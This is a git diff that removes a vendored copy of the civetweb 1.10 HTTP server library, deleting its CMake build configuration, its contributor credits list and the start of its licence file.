diff --git a/thirdparty/civetweb-1.10/CMakeLists.txt b/thirdparty/civetweb-1.10/CMakeLists.txt
deleted file mode 100644
index f559a04..0000000
--- a/thirdparty/civetweb-1.10/CMakeLists.txt
+++ /dev/null
@@ -1,492 +0,0 @@
-# Determines what CMake APIs we can rely on
-cmake_minimum_required (VERSION 2.8.11)
-if (${CMAKE_VERSION} VERSION_GREATER 3.2.2)
-  cmake_policy(VERSION 3.2.2)
-endif()
-if (${CMAKE_VERSION} VERSION_GREATER 3.1 OR
-    ${CMAKE_VERSION} VERSION_EQUAL 3.1)
-  cmake_policy(SET CMP0054 NEW)
-endif()
-
-# Do not allow in source builds
-set(CMAKE_DISABLE_SOURCE_CHANGES ON)
-set(CMAKE_DISABLE_IN_SOURCE_BUILD ON)
-
-# Make sure we can import out CMake functions
-list(APPEND CMAKE_MODULE_PATH "${CMAKE_CURRENT_SOURCE_DIR}/cmake")
-
-# Load in the needed CMake modules
-include(CheckIncludeFiles)
-include(CheckCCompilerFlag)
-include(CheckCXXCompilerFlag)
-include(AddCCompilerFlag)
-include(AddCXXCompilerFlag)
-include(DetermineTargetArchitecture)
-include(CMakeDependentOption)
-
-# Set up the project
-project (civetweb)
-set(CIVETWEB_VERSION "1.10.0" CACHE STRING "The version of the civetweb library")
-string(REGEX MATCH "([0-9]+)\\.([0-9]+)\\.([0-9]+)" CIVETWEB_VERSION_MATCH "${CIVETWEB_VERSION}")
-if ("${CIVETWEB_VERSION_MATCH}" STREQUAL "")
-  message(FATAL_ERROR "Must specify a semantic version: major.minor.patch")
-endif()
-set(CIVETWEB_VERSION_MAJOR "${CMAKE_MATCH_1}")
-set(CIVETWEB_VERSION_MINOR "${CMAKE_MATCH_2}")
-set(CIVETWEB_VERSION_PATCH "${CMAKE_MATCH_3}")
-determine_target_architecture(CIVETWEB_ARCHITECTURE)
-
-# Detect the platform reliably
-if(NOT MACOSX AND ${CMAKE_SYSTEM_NAME} MATCHES "Darwin")
-   SET(DARWIN YES)
-elseif(NOT BSD AND ${CMAKE_SYSTEM_NAME} MATCHES "FreeBSD")
-    SET(FREEBSD YES)
-elseif(NOT LINUX AND ${CMAKE_SYSTEM_NAME} MATCHES "Linux")
-    SET(LINUX YES)
-endif()
-
-# C++ wrappers
-option(CIVETWEB_ENABLE_THIRD_PARTY_OUTPUT "Shows the output of third party dependency processing" OFF)
-
-# Thread Stack Size
-set(CIVETWEB_THREAD_STACK_SIZE 102400 CACHE STRING
-  "The stack size in bytes for each thread created")
-set_property(CACHE CIVETWEB_THREAD_STACK_SIZE PROPERTY VALUE ${CIVETWEB_THREAD_STACK_SIZE})
-message(STATUS "Thread Stack Size - ${CIVETWEB_THREAD_STACK_SIZE}")
-
-# Serve no files from the web server
-option(CIVETWEB_SERVE_NO_FILES "Configures the server to serve no static files" OFF)
-message(STATUS "Serve no static files - ${CIVETWEB_SERVE_NO_FILES}")
-
-# Serve no files from the web server
-option(CIVETWEB_DISABLE_CGI "Disables CGI, so theserver will not execute CGI scripts" OFF)
-message(STATUS "Disable CGI support - ${CIVETWEB_DISABLE_CGI}")
-
-# Disable caching
-option(CIVETWEB_DISABLE_CACHING "Disables caching, so that no timegm is used." OFF)
-message(STATUS "Disable caching support - ${CIVETWEB_DISABLE_CACHING}")
-
-# C++ wrappers
-option(CIVETWEB_ENABLE_CXX "Enables the C++ wrapper library" OFF)
-message(STATUS "C++ wrappers - ${CIVETWEB_ENABLE_CXX}")
-
-# IP Version 6
-option(CIVETWEB_ENABLE_IPV6 "Enables the IP version 6 support" OFF)
-message(STATUS "IP Version 6 - ${CIVETWEB_ENABLE_IPV6}")
-
-# Websocket support
-option(CIVETWEB_ENABLE_WEBSOCKETS "Enable websockets connections" OFF)
-message(STATUS "Websockets support - ${CIVETWEB_ENABLE_WEBSOCKETS}")
-
-# Server statistics support
-option(CIVETWEB_ENABLE_SERVER_STATS "Enable server statistics" OFF)
-message(STATUS "Server statistics support - ${CIVETWEB_ENABLE_SERVER_STATS}")
-
-# Memory debugging
-option(CIVETWEB_ENABLE_MEMORY_DEBUGGING "Enable the memory debugging features" OFF)
-message(STATUS "Memory Debugging - ${CIVETWEB_ENABLE_MEMORY_DEBUGGING}")
-
-# ASAN in debug mode (-fsanitize=address, etc)
-option(CIVETWEB_ENABLE_ASAN "Enable ASAN in debug mode" ON)
-message(STATUS "ASAN in debug mode - ${CIVETWEB_ENABLE_ASAN}")
-
-# ARCH flag
-option(CIVETWEB_ARCH "Force 32/64 bit architecture" OFF)
-message(STATUS "Force x32 / x64 architecture - ${CIVETWEB_ARCH}")
-
-# LUA CGI support
-option(CIVETWEB_ENABLE_LUA "Enable Lua CGIs" OFF)
-message(STATUS "Lua CGI support - ${CIVETWEB_ENABLE_LUA}")
-
-# Enable installing CivetWeb executables
-option(CIVETWEB_INSTALL_EXECUTABLE "Enable installing CivetWeb executable" ON)
-mark_as_advanced(FORCE CIVETWEB_INSTALL_EXECUTABLE) # Advanced users can disable
-message(STATUS "Executable installation - ${CIVETWEB_INSTALL_EXECUTABLE}") 
-
-# Allow builds to complete with warnings (do not set -Werror)
-# CivetWeb Linux support is stable:
-# Builds for GCC 4.6 and clang 3.4 are free from warnings.
-# However, GCC introduced a couple of new, partially idiotic warnings,
-# that can not be disabled using a #pragma directive.
-# It seems unreasonable to have all GCC versions warning free, but only
-# some selected ones.
-option(CIVETWEB_ALLOW_WARNINGS "Do not stop build if there are warnings" ON)
-message(STATUS "Build if there are warnings - ${CIVETWEB_ALLOW_WARNINGS}")
-
-# Link to the shared LUA library
-cmake_dependent_option(
-  CIVETWEB_ENABLE_LUA_SHARED  "Link to the shared LUA system library" OFF
- CIVETWEB_ENABLE_LUA OFF)
-if (CIVETWEB_ENABLE_LUA)
-  message(STATUS "Linking shared Lua library - ${CIVETWEB_ENABLE_LUA_SHARED}")
-endif()
-
-# Lua Third Party Settings
-if (CIVETWEB_ENABLE_LUA)
-  if (NOT CIVETWEB_ENABLE_LUA_SHARED)
-    # Lua Version
-    set(CIVETWEB_LUA_VERSION 5.2.4 CACHE STRING
-      "The version of Lua to build and include statically")
-    set_property(CACHE CIVETWEB_LUA_VERSION PROPERTY VALUE ${CIVETWEB_LUA_VERSION})
-    message(STATUS "Lua Version - ${CIVETWEB_LUA_VERSION}")
-    mark_as_advanced(CIVETWEB_LUA_VERSION)
-
-    # Lua Verification Hash
-    set(CIVETWEB_LUA_MD5_HASH 913fdb32207046b273fdb17aad70be13 CACHE STRING
-      "The hash of Lua archive to be downloaded")
-    set_property(CACHE CIVETWEB_LUA_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_MD5_HASH})
-    mark_as_advanced(CIVETWEB_LUA_MD5_HASH)
-  endif()
-
-  # Lua Filesystem Version
-  set(CIVETWEB_LUA_FILESYSTEM_VERSION 1.6.3 CACHE STRING
-    "The version of Lua Filesystem to build and include statically")
-  set_property(CACHE CIVETWEB_LUA_FILESYSTEM_VERSION PROPERTY VALUE ${CIVETWEB_LUA_FILESYSTEM_VERSION})
-  message(STATUS "Lua Filesystem Version - ${CIVETWEB_LUA_FILESYSTEM_VERSION}")
-  mark_as_advanced(CIVETWEB_LUA_FILESYSTEM_VERSION)
-
-  # Lua Filesystem Verification Hash
-  set(CIVETWEB_LUA_FILESYSTEM_MD5_HASH d0552c7e5a082f5bb2865af63fb9dc95 CACHE STRING
-    "The hash of Lua Filesystem archive to be downloaded")
-  set_property(CACHE CIVETWEB_LUA_FILESYSTEM_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_FILESYSTEM_MD5_HASH})
-  mark_as_advanced(CIVETWEB_LUA_FILESYSTEM_MD5_HASH)
-
-  # Lua SQLite Version
-  set(CIVETWEB_LUA_SQLITE_VERSION 0.9.3 CACHE STRING
-    "The version of Lua SQLite to build and include statically")
-  set_property(CACHE CIVETWEB_LUA_SQLITE_VERSION PROPERTY VALUE ${CIVETWEB_LUA_SQLITE_VERSION})
-  message(STATUS "Lua SQLite Version - ${CIVETWEB_LUA_SQLITE_VERSION}")
-  mark_as_advanced(CIVETWEB_LUA_SQLITE_VERSION)
-
-  # Lua SQLite Verification Hash
-  set(CIVETWEB_LUA_SQLITE_MD5_HASH 43234ae08197dfce6da02482ed14ec92 CACHE STRING
-    "The hash of Lua SQLite archive to be downloaded")
-  set_property(CACHE CIVETWEB_LUA_SQLITE_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_SQLITE_MD5_HASH})
-  mark_as_advanced(CIVETWEB_LUA_SQLITE_MD5_HASH)
-
-  # Lua XML Version
-  set(CIVETWEB_LUA_XML_VERSION 1.8.0 CACHE STRING
-    "The version of Lua XML to build and include statically")
-  set_property(CACHE CIVETWEB_LUA_XML_VERSION PROPERTY VALUE ${CIVETWEB_LUA_XML_VERSION})
-  message(STATUS "Lua XML Version - ${CIVETWEB_LUA_XML_VERSION}")
-  mark_as_advanced(CIVETWEB_LUA_XML_VERSION)
-
-  # Lua XML Verification Hash
-  set(CIVETWEB_LUA_XML_MD5_HASH 25e4c276c5d8716af1de0c7853aec2b4 CACHE STRING
-    "The hash of Lua XML archive to be downloaded")
-  set_property(CACHE CIVETWEB_LUA_XML_MD5_HASH PROPERTY VALUE ${CIVETWEB_LUA_XML_MD5_HASH})
-  mark_as_advanced(CIVETWEB_LUA_XML_MD5_HASH)
-
-  # SQLite Version
-  set(CIVETWEB_SQLITE_VERSION 3.8.9 CACHE STRING
-    "The version of SQLite to build and include statically")
-  set_property(CACHE CIVETWEB_SQLITE_VERSION PROPERTY VALUE ${CIVETWEB_SQLITE_VERSION})
-  message(STATUS "SQLite Version - ${CIVETWEB_SQLITE_VERSION}")
-  mark_as_advanced(CIVETWEB_SQLITE_VERSION)
-
-  # SQLite Verification Hash
-  set(CIVETWEB_SQLITE_MD5_HASH 02e9c3a6daa8b8587cf6bef828c2e33f CACHE STRING
-    "The hash of SQLite archive to be downloaded")
-  set_property(CACHE CIVETWEB_SQLITE_MD5_HASH PROPERTY VALUE ${CIVETWEB_SQLITE_MD5_HASH})
-  mark_as_advanced(CIVETWEB_SQLITE_MD5_HASH)
-endif()
-
-# Duktape CGI support
-option(CIVETWEB_ENABLE_DUKTAPE "Enable Duktape CGIs" OFF)
-message(STATUS "Duktape CGI support - ${CIVETWEB_ENABLE_DUKTAPE}")
-
-# SSL support
-option(CIVETWEB_ENABLE_SSL "Enables the secure socket layer" ON)
-message(STATUS "SSL support - ${CIVETWEB_ENABLE_SSL}")
-
-# OpenSSL 1.1 API
-option(CIVETWEB_SSL_OPENSSL_API_1_1 "Use the OpenSSL 1.1 API" OFF)
-message(STATUS "Compile for OpenSSL 1.1 API - ${CIVETWEB_SSL_OPENSSL_API_1_1}")
-
-# Dynamically load or link the SSL libraries
-cmake_dependent_option(
-  CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING "Dynamically loads the SSL library rather than linking it" ON
-  CIVETWEB_ENABLE_SSL OFF)
-if (CIVETWEB_ENABLE_SSL)
-  message(STATUS "Dynamically load SSL libraries - ${CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING}")
-endif()
-
-# Third Party Download location
-set(CIVETWEB_THIRD_PARTY_DIR "${CMAKE_BINARY_DIR}/third_party" CACHE STRING
-  "The location that third party code is downloaded, built and installed")
-set_property(CACHE CIVETWEB_THIRD_PARTY_DIR PROPERTY VALUE ${CIVETWEB_THIRD_PARTY_DIR})
-
-# Unix systems can define the dynamic library names to load
-if (CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING AND NOT DARWIN AND UNIX)
-  # SSL library name
-  set(CIVETWEB_SSL_SSL_LIB "libssl.so" CACHE STRING
-    "The name of the SSL library to load")
-  set_property(CACHE CIVETWEB_SSL_SSL_LIB PROPERTY VALUE ${CIVETWEB_SSL_SSL_LIB})
-  message(STATUS "SSL Library Name - ${CIVETWEB_SSL_SSL_LIB}")
-
-  # Crytography library name
-  set(CIVETWEB_SSL_CRYPTO_LIB "libcrypto.so" CACHE STRING
-    "The name of the SSL Cryptography library to load")
-  set_property(CACHE CIVETWEB_SSL_CRYPTO_LIB PROPERTY VALUE ${CIVETWEB_SSL_CRYPTO_LIB})
-  message(STATUS "SSL Cryptography Library Name - ${CIVETWEB_SSL_CRYPTO_LIB}")
-endif()
-
-# Allow warnings in 3rd party components
-if (CIVETWEB_ENABLE_LUA OR CIVETWEB_ENABLE_DUKTAPE)
-SET(CIVETWEB_ALLOW_WARNINGS YES)
-endif()
-
-# The C and C++ standards to use
-set(CIVETWEB_C_STANDARD auto CACHE STRING
-  "The C standard to use; auto determines the latest supported by the compiler")
-set_property(CACHE CIVETWEB_C_STANDARD PROPERTY STRINGS auto c11 c99 c89)
-set(CIVETWEB_CXX_STANDARD auto CACHE STRING
-  "The C++ standard to use; auto determines the latest supported by the compiler")
-set_property(CACHE CIVETWEB_CXX_STANDARD PROPERTY STRINGS auto c++14 c++11 c++98)
-
-# Configure the linker
-if ("${CMAKE_C_COMPILER_ID}" STREQUAL "GNU")
-  find_program(GCC_AR gcc-ar)
-  if (GCC_AR)
-    set(CMAKE_AR ${GCC_AR})
-  endif()
-  find_program(GCC_RANLIB gcc-ranlib)
-  if (GCC_RANLIB)
-    set(CMAKE_RANLIB ${GCC_RANLIB})
-  endif()
-endif()
-
-# Configure the C compiler
-message(STATUS "Configuring C Compiler")
-if ("${CIVETWEB_C_STANDARD}" STREQUAL "auto")
-  add_c_compiler_flag(-std=c11)
-  if (NOT HAVE_C_FLAG_STD_C11)
-    add_c_compiler_flag(-std=c99)
-    if (NOT HAVE_C_FLAG_STD_C99)
-      add_c_compiler_flag(-std=c89)
-    endif()
-  endif()
-else()
-  add_c_compiler_flag(-std=${CIVETWEB_C_STANDARD})
-endif()
-
-#Warnings: enable everything
-add_c_compiler_flag(-Wall)
-add_c_compiler_flag(-Wextra)
-add_c_compiler_flag(-Wshadow)
-add_c_compiler_flag(-Wconversion)
-add_c_compiler_flag(-Wmissing-prototypes)
-add_c_compiler_flag(-Weverything)
-add_c_compiler_flag(-Wparentheses)
-add_c_compiler_flag(/W4) # VisualStudio highest warning level
-
-#Warnings: Disable some warnings
-add_c_compiler_flag(-Wno-padded) # padding in structures by compiler
-add_c_compiler_flag(-Wno-unused-macros) # so what?
-add_c_compiler_flag(-Wno-reserved-id-macros) # for system headers
-add_c_compiler_flag(-Wno-format-nonliteral) # printf(myFormatStringVar, ...)
-add_c_compiler_flag(-Wno-date-time) # using __DATE__ once
-add_c_compiler_flag(-Wno-cast-qual) # const cast
-add_c_compiler_flag(-Wno-unknown-warning-option) # Xcode 9
-add_c_compiler_flag(/Wd4820) # padding
-
-if (MINGW)
-  add_c_compiler_flag(-Wno-format)
-endif()
-if (NOT CIVETWEB_ALLOW_WARNINGS)
-  add_c_compiler_flag(-Werror)
-endif()
-add_c_compiler_flag(/WX)
-add_c_compiler_flag(-pedantic-errors)
-add_c_compiler_flag(-fvisibility=hidden)
-add_c_compiler_flag(-fstack-protector-strong RELEASE)
-add_c_compiler_flag(-flto RELEASE)
-
-add_c_compiler_flag(-fstack-protector-all DEBUG)
-if (MINGW)
-  add_c_compiler_flag(-mwindows)
-endif()
-
-# Coverage build type
-set(CMAKE_C_FLAGS_COVERAGE "${CMAKE_C_FLAGS_DEBUG}" CACHE STRING
-    "Flags used by the C compiler during coverage builds."
-    FORCE)
-set(CMAKE_EXE_LINKER_FLAGS_COVERAGE
-    "${CMAKE_EXE_LINKER_FLAGS_DEBUG}" CACHE STRING
-    "Flags used for linking binaries during coverage builds."
-    FORCE)
-set(CMAKE_SHARED_LINKER_FLAGS_COVERAGE
-    "${CMAKE_SHARED_LINKER_FLAGS_DEBUG}" CACHE STRING
-    "Flags used by the shared libraries linker during coverage builds."
-    FORCE)
-mark_as_advanced(
-    CMAKE_CXX_FLAGS_COVERAGE
-    CMAKE_C_FLAGS_COVERAGE
-    CMAKE_EXE_LINKER_FLAGS_COVERAGE
-    CMAKE_SHARED_LINKER_FLAGS_COVERAGE)
-set(CMAKE_BUILD_TYPE "${CMAKE_BUILD_TYPE}" CACHE STRING
-    "Choose the type of build, options are: None Debug Release RelWithDebInfo MinSizeRel Coverage."
-    FORCE)
-add_c_compiler_flag(--coverage COVERAGE)
-
-# Configure the C++ compiler
-if (CIVETWEB_ENABLE_CXX)
-  message(STATUS "Configuring C++ Compiler")
-  if ("${CIVETWEB_CXX_STANDARD}" STREQUAL "auto")
-    add_cxx_compiler_flag(-std=c++14)
-    if (NOT HAVE_CXX_FLAG_STD_CXX14)
-      add_cxx_compiler_flag(-std=c++11)
-      if (NOT HAVE_CXX_FLAG_STD_CXX11)
-        add_cxx_compiler_flag(-std=c++98)
-      endif()
-    endif()
-  else()
-    add_cxx_compiler_flag(-std=${CIVETWEB_CXX_STANDARD})
-  endif()
-  add_cxx_compiler_flag(-Wall)
-  add_cxx_compiler_flag(-Wextra)
-  add_cxx_compiler_flag(-Wshadow)
-  add_cxx_compiler_flag(-Wmissing-prototypes)
-  add_cxx_compiler_flag(-Weverything)
-  add_cxx_compiler_flag(/W4)
-  add_cxx_compiler_flag(-Wno-padded)
-  add_cxx_compiler_flag(/Wd4820) # padding
-  add_cxx_compiler_flag(-Wno-unused-macros)
-  add_cxx_compiler_flag(-Wno-format-nonliteral)
-  if (MINGW)
-    add_cxx_compiler_flag(-Wno-format)
-  endif()
-  if (NOT CIVETWEB_ALLOW_WARNINGS)
-    add_cxx_compiler_flag(-Werror)
-  endif()
-  add_cxx_compiler_flag(/WX)
-  add_cxx_compiler_flag(-pedantic-errors)
-  add_cxx_compiler_flag(-fvisibility=hidden)
-  add_cxx_compiler_flag(-fstack-protector-strong RELEASE)
-  add_cxx_compiler_flag(-flto RELEASE)
-
-  add_cxx_compiler_flag(-fstack-protector-all DEBUG)
-  if (MINGW)
-    add_cxx_compiler_flag(-mwindows)
-  endif()
-  set(CMAKE_CXX_FLAGS_COVERAGE "${CMAKE_CXX_FLAGS_DEBUG}" CACHE STRING
-      "Flags used by the C++ compiler during coverage builds."
-      FORCE)
-  add_cxx_compiler_flag(--coverage COVERAGE)
-endif()
-
-# Set up the definitions
-if (${CMAKE_BUILD_TYPE} MATCHES "[Dd]ebug")
-  add_definitions(-DDEBUG)
-endif()
-if (CIVETWEB_ENABLE_IPV6)
-  add_definitions(-DUSE_IPV6)
-endif()
-if (CIVETWEB_ENABLE_WEBSOCKETS)
-  add_definitions(-DUSE_WEBSOCKET)
-endif()
-if (CIVETWEB_ENABLE_SERVER_STATS)
-  add_definitions(-DUSE_SERVER_STATS)
-endif()
-if (CIVETWEB_SERVE_NO_FILES)
-  add_definitions(-DNO_FILES)
-endif()
-if (CIVETWEB_DISABLE_CGI)
-  add_definitions(-DNO_CGI)
-endif()
-if (CIVETWEB_DISABLE_CACHING)
-  add_definitions(-DNO_CACHING)
-endif()
-if (CIVETWEB_ENABLE_LUA)
-  add_definitions(-DUSE_LUA)
-endif()
-if (CIVETWEB_ENABLE_DUKTAPE)
-  add_definitions(-DUSE_DUKTAPE)
-endif()
-if (CIVETWEB_ENABLE_MEMORY_DEBUGGING)
-  add_definitions(-DMEMORY_DEBUGGING)
-endif()
-if (NOT CIVETWEB_ENABLE_SSL)
-  add_definitions(-DNO_SSL)
-elseif (NOT CIVETWEB_ENABLE_SSL_DYNAMIC_LOADING)
-  add_definitions(-DNO_SSL_DL)
-else()
-  if(CIVETWEB_SSL_SSL_LIB)
-    add_definitions(-DSSL_LIB="${CIVETWEB_SSL_SSL_LIB}")
-  endif()
-  if(CIVETWEB_SSL_CRYPTO_LIB)
-    add_definitions(-DCRYPTO_LIB="${CIVETWEB_SSL_CRYPTO_LIB}")
-  endif()
-endif()
-if(CIVETWEB_SSL_OPENSSL_API_1_1)
-  add_definitions(-DOPENSSL_API_1_1)
-endif()
-add_definitions(-DUSE_STACK_SIZE=${CIVETWEB_THREAD_STACK_SIZE})
-
-# Set 32 or 64 bit environment
-if (${CMAKE_ARCH} MATCHES "[Xx]86")
-add_c_compiler_flag(-m32)
-endif()
-if (${CMAKE_ARCH} MATCHES "[Xx]64")
-add_c_compiler_flag(-m64)
-endif()
-# TODO: add support for -march
-
-# Build the targets
-add_subdirectory(src)
-
-# Enable the testing of the library/executable
-include(CTest)
-if (BUILD_CIVET_TESTING)
-  message(" -- CIVET TESTING ENABLED -- ")
-  # Check unit testing framework Version
-  set(CIVETWEB_CHECK_VERSION 0.11.0 CACHE STRING
-    "The version of Check unit testing framework to build and include statically")
-  set_property(CACHE CIVETWEB_CHECK_VERSION PROPERTY VALUE ${CIVETWEB_CHECK_VERSION})
-  message(STATUS "Check Unit Testing Framework Version - ${CIVETWEB_CHECK_VERSION}")
-  mark_as_advanced(CIVETWEB_CHECK_VERSION)
-
-  # Check unit testing framework Verification Hash
-  # Hash for Check 0.10.0: 67a34c40b5bc888737f4e5ae82e9939f
-  # Hash for Check 0.11.0: 1b14ee307dca8e954a8219c34484d7c4
-  set(CIVETWEB_CHECK_MD5_HASH 1b14ee307dca8e954a8219c34484d7c4 CACHE STRING
-    "The hash of Check unit testing framework archive to be downloaded")
-  set_property(CACHE CIVETWEB_CHECK_MD5_HASH PROPERTY VALUE ${CIVETWEB_CHECK_MD5_HASH})
-  mark_as_advanced(CIVETWEB_CHECK_MD5_HASH)
-
-  # Build the testing
-  add_subdirectory(test)
-endif()
-
-# Set up CPack
-include(InstallRequiredSystemLibraries)
-set(CPACK_PACKAGE_VENDOR "civetweb Contributors")
-set(CPACK_PACKAGE_CONTACT "civetweb@github.com")
-set(CPACK_PACKAGE_VERSION_MAJOR "${CIVETWEB_VERSION_MAJOR}")
-set(CPACK_PACKAGE_VERSION_MINOR "${CIVETWEB_VERSION_MINOR}")
-set(CPACK_PACKAGE_VERSION_PATCH "${CIVETWEB_VERSION_PATCH}")
-set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "A HTTP library and server")
-set(CPACK_PACKAGE_DESCRIPTION_FILE "${CMAKE_CURRENT_SOURCE_DIR}/README.md")
-set(CPACK_RESOURCE_FILE_LICENSE "${CMAKE_CURRENT_SOURCE_DIR}/LICENSE.md")
-set(CPACK_STRIP_FILES TRUE)
-set(CPACK_PACKAGE_DEPENDS "openssl")
-if (CIVETWEB_ENABLE_LUA_SHARED)
-  set(CPACK_PACKAGE_DEPENDS "lua, ${CPACK_PACKAGE_DEPENDS}")
-endif()
-
-# RPM Packaging
-set(CPACK_RPM_PACKAGE_GROUP "Development/Libraries")
-set(CPACK_RPM_PACKAGE_LICENSE "MIT")
-set(CPACK_RPM_PACKAGE_ARCHITECTURE "${CIVETWEB_ARCHITECTURE}")
-set(CPACK_RPM_PACKAGE_REQUIRES "${CPACK_PACKAGE_DEPENDS}")
-
-# Debian Packaging
-set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "${CIVETWEB_ARCHITECTURE}")
-set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://github.com/civetweb/civetweb")
-set(CPACK_DEBIAN_PACKAGE_DEPENDS "${CPACK_PACKAGE_DEPENDS}")
-
-# WiX Packaging
-# TODO: www.cmake.org/cmake/help/v3.0/module/CPackWIX.html
-
-# Finalize CPack settings
-include(CPack)
diff --git a/thirdparty/civetweb-1.10/CREDITS.md b/thirdparty/civetweb-1.10/CREDITS.md
deleted file mode 100644
index 4e4c987..0000000
--- a/thirdparty/civetweb-1.10/CREDITS.md
+++ /dev/null
@@ -1,167 +0,0 @@
-# Civetweb Contributors
-
-* Abhishek Lekshmanan
-* Adam Bailey
-* Alan Somers
-* Alex Kozlov
-* bel2125
-* Ben M. Ward
-* BigJoe
-* Bjoern Petri
-* Braedy Kuzma
-* brett
-* Brian Lambert
-* Brian Spratke
-* cdbishop
-* celeron55
-* Charles Olivi
-* Christian Mauderer
-* Christopher Galas
-* cjh
-* Daniel Oaks
-* Daniel Rempel
-* Danny Al-Gaaf
-* Dave Brower
-* David Arnold
-* David Loffredo
-* Dialga
-* ehlertjd
-* Eric Tsau
-* Erik Beran
-* extergnoto
-* F-Secure Corporation
-* feneuilflo
-* Fernando G. Aranda
-* Grahack
-* grenclave
-* grunk
-* hansipie
-* HariKamath Kamath
-* Henry Chang
-* Jack
-* Jacob Skillin
-* Jan Willem Janssen
-* Jeremy Lin
-* Jim Evans
-* jmc-
-* Jochen Scheib
-* Joe Mucchiello
-* Joel Gallant
-* Johan De Taeye
-* Jordan
-* Jordan Shelley
-* Joshua Boyd
-* Joshua D. Boyd
-* kakwa
-* kalphamon
-* Keith Kyzivat
-* Kevin Branigan
-* Kevin Wojniak
-* Kimmo Mustonen
-* Lammert Bies
-* Lawrence
-* Li Peng
-* Lianghui
-* Maarten Fremouw
-* makrsmark
-* Mark Lakata
-* Martin Gaida
-* Mateusz Gralka
-* Matt Clarkson
-* mingodad
-* Morgan McGuire
-* mrdvlpr.xnu
-* Neil Jensen
-* Nick Hildebrant
-* Nigel Stewart
-* nihildeb
-* No Face Press
-* palortoff
-* Patrick Drechsler
-* Patrick Trinkle
-* Paul Sokolovsky
-* Paulo Brizolara
-* pavel.pimenov
-* PavelVozenilek
-* Perttu Ahola
-* Peter Foerster
-* Philipp Friedenberger
-* Philipp Hasper
-* Red54
-* Richard Screene
-* pkvamme
-* Sage Weil
-* Sangwhan Moon
-* Saumitra Vikram
-* Scott Nations
-* sgmesservey
-* shantanugadgil
-* Simon Hailes
-* slidertom
-* SpaceLord
-* sunfch
-* thewaterymoon
-* THILMANT, Bernard
-* Thomas Davis
-* tnoho
-* Toni Wilk
-* Ulrich Hertlein
-* Walt Steverson
-* webxer
-* William Greathouse
-* xeoshow
-* xtne6f
-* Yehuda Sadeh
-
-# Mongoose Contributors
-CivetWeb is based on the Mongoose code.  The following users contributed to the original Mongoose release between 2010 and 2013.  This list was generated from the Mongoose GIT logs.  It does not contain contributions from the Mongoose mailing list.  There is no record for contributors prior to 2010.
-
-* Sergey Lyubka
-* Arnout Vandecappelle (Essensium/Mind)
-* Benoît Amiaux
-* Cody Hanson
-* Colin Leitner
-* Daniel Oaks
-* Eric Bakan
-* Erik Oomen
-* Filipp Kovalev
-* Ger Hobbelt
-* Hendrik Polczynski
-* Henrique Mendonça
-* Igor Okulist
-* Jay
-* Joe Mucchiello
-* John Safranek
-* Joseph Mainwaring
-* José Miguel Gonçalves
-* KIU Shueng Chuan
-* Katerina Blinova
-* Konstantin Sorokin
-* Marin Atanasov Nikolov
-* Matt Healy
-* Miguel Morales
-* Mikhail Nikalyukin
-* MikieMorales
-* Mitch Hendrickson
-* Nigel Stewart
-* Pavel
-* Pavel Khlebovich
-* Rogerz Zhang
-* Sebastian Reinhard
-* Stefan Doehla
-* Thileepan
-* abadc0de
-* arvidn
-* bick
-* ff.feng
-* jmucchiello
-* jwang
-* lsm
-* migal
-* mlamb
-* nullable.type
-* shantanugadgil
-* tayS
-* test
-* valenok
-
diff --git a/thirdparty/civetweb-1.10/LICENSE.md b/thirdparty/civetweb-1.10/LICENSE.md
deleted file mode 100644
index be6ae19..0000000
--- a/thirdparty/civetweb-1.10/LICENSE.md
+++ /dev/null
@@ -1,208 +0,0 @@
-ALL LICENSES
-=====
-
-This document includes several copyright licenses for different
-aspects of the software.  Not all licenses may apply depending
-on the features chosen.
-
-
-Civetweb License
------
-
-### Included with all features.
-
-> Copyright (c) 2013-2017 The CivetWeb developers ([CREDITS.md](https://github.com/civetweb/civetweb/blob/master/CREDITS.md))
->
-> Copyright (c) 2004-2013 Sergey Lyubka
->
-> Copyright (c) 2013 No Face Press, LLC (Thomas Davis)
->
-> Copyright (c) 2013 F-Secure Corporation
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-> OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
-> THE SOFTWARE.
-
-
-Lua License
-------
-
-### Included only if built with Lua support.
-
-http://www.lua.org/license.html
-
-> Copyright (C) 1994-2015 Lua.org, PUC-Rio.
->
-> Permission is hereby granted, free of charge, to any person obtaining a copy
-> of this software and associated documentation files (the "Software"), to deal
-> in the Software without restriction, including without limitation the rights
-> to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-> copies of the Software, and to permit persons to whom the Software is
-> furnished to do so, subject to the following conditions:
->
-> The above copyright notice and this permission notice shall be included in
-> all copies or substantial portions of the Software.
->
-> THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-> IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-> FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-> AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-> LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
